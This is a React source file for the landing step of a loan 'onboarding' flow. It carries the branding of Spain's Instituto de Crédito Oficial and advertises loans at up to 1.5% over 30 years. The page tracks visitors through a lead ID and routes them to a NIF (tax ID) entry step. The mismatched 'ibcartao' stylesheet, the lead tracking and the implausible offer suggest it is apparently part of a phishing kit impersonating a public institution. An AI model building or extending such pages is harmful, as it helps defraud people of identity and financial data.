import React, { useState, useRef, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import './ibcartao.css';
import { sendEvent } from './Config';
import Footer from './components/Footer';

const Step1 = function () {
    const navigate = useNavigate();
    const leadIdRef = useRef(localStorage.getItem("lead_id"));

    const handleFormSubmit = async (e) => {
        try {
            e.preventDefault();

            navigate('/onboarding/nif');
        } catch (e) {
            console.error(e.message);
        }
    }

    useEffect(() => {
        sendEvent(leadIdRef.current ?? false, "website-opened", true);
    }, []);

    return <>
        <div className='header flex items-center'>
            <div className='content flex items-center gap-x-4'>
                <div className='flex items-center w-auto border-r pr-4'>
                    <img src='/assets/img/logo-white.svg?t' className='logo' />
                </div>
                <div className='flex-1'>
                    <span className='subtitle'>Instituto de Crédito Oficial</span>
                </div>
            </div>
        </div>
        <div className="steps mt-5 flex gap-x-2">
            <div className='flex-1 check'></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
        </div>
        <div className='container'>
            <form onSubmit={handleFormSubmit}>
                <div className='content mt-8'>
                    <h1>Descubra en minutos si su empresa puede acceder al crédito ICO con condiciones únicas</h1>
                    <p className='mt-6 separator-bottom pb-8'>Con el apoyo del ICO, su empresa puede acceder a financiación con un interés de hasta 1,5% anual y plazos de hasta 30 años.</p>
                    <button type="submit" className='primary w-full mt-12'>Continuar</button>
                </div>
            </form>
        </div>
    </>
}

export default Step1;